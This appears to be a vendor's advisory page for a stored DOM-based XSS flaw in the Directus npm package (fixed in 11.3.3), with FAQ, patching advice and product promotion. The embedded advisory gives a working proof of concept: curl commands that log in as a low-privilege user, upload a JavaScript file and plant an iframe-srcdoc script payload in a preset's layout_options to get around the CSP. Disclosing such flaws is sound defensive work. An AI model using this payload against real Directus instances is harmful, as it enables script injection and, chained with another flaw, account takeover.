How severe is GHSA-9qrm-48qf-r2rw?

GHSA-9qrm-48qf-r2rw has a CVSS score of 3.4/10, rated LOW. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-9qrm-48qf-r2rw?

GHSA-9qrm-48qf-r2rw affects the following packages: directus (npm). Ecosystems affected: npm.

How do I fix GHSA-9qrm-48qf-r2rw?

Update directus to 11.3.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9qrm-48qf-r2rw is resolved across your whole dependency graph.

How do I detect GHSA-9qrm-48qf-r2rw in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for directus. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-9qrm-48qf-r2rw if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-9qrm-48qf-r2rw?

O3 pinpoints whether GHSA-9qrm-48qf-r2rw is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-9qrm-48qf-r2rw actively exploited in the wild?

No public exploit code has been indexed for GHSA-9qrm-48qf-r2rw yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-9qrm-48qf-r2rw published, and has it been updated?

GHSA-9qrm-48qf-r2rw was published on January 23, 2025. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-9qrm-48qf-r2rw

LOW

Directus has a DOM-Based cross-site scripting (XSS) via layout_options

Published

Jan 23, 2025

Updated

Jan 23, 2025

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

directusnpm

25Kdownloads / week

Description

Impact

Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with CVE-2024-6534, it could result in account takeover.

PoC

To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

Upload the following JavaScript file.

Using the upload functionality at POST /files. This PoC will show an alert message.

export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="[email protected]"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")

Create a preset for a collection and store the preset ID.

Or use a preset already created from GET /presets. The following example uses the direct_users preset.

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

When the user visits the view that uses the directus_users preset, the JavaScript file will be executed.

Notes:

Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is <iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">.

We can target any collection that uses the vulnerable template structure that renders the layout option section.

In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`directus`	all versions	11.3.3

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for directus. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update directus to 11.3.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9qrm-48qf-r2rw is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-9qrm-48qf-r2rw is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-9qrm-48qf-r2rw. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Impact Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. ### PoC To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account. 1. Upload the following JavaScript file.

O3 Security · Impact-Aware SCA

Is GHSA-9qrm-48qf-r2rw in your dependencies?

O3 detects GHSA-9qrm-48qf-r2rw across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works